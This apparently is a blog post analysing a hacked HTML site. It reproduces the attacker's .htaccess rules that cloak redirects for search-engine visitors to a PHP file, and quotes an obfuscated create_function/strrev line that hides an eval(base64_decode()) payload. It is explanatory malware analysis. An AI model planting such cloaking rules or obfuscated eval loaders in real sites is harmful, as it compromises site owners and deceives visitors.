A simple, clean, flat html site was recently hacked for its Search Engine referrer. Arriving at the site by typing the domain, or some secondary link, would provide the site without issue. Arriving via an SE or with an SE user agent, well, that’s a paddlin’


Here’s the .htaccess file

RewriteEngine On

RewriteCond %{ENV:REDIRECT_STATUS} 200
RewriteRule ^ – [L]
RewriteCond %{HTTP_USER_AGENT} (google|yahoo|msn|aol|bing) [OR]
RewriteCond %{HTTP_REFERER} (google|yahoo|msn|aol|bing)
RewriteRule ^(.*)$ details-enforcers.php?$1 [L]

ooooh…details-enforcers.php. Sounds important! Let’s take a look:

Screen Shot 2016-08-09 at 7.15.35 AM

Hello Mr. Fancy Pants. Let’s see what you are trying to hide:

That first variable is


is fancy-speak for create_function

$qweboi = $meymun(‘$a’,strrev(‘;)a$(lave’));

becomes an anonymous function lambda_1. Then the next line we see a strrev(), because nothing is as secure as reversing a string. So lets do it: Hey, it’s an eval(base64_decode())! **sarcasm**

It is a PHP script I have put HERE. What’s funny is that they base64_encoded() a domain name in the script:


That sends content. The domain?


You know they are good because they use 1’s for i’s and zero’s for o’s.






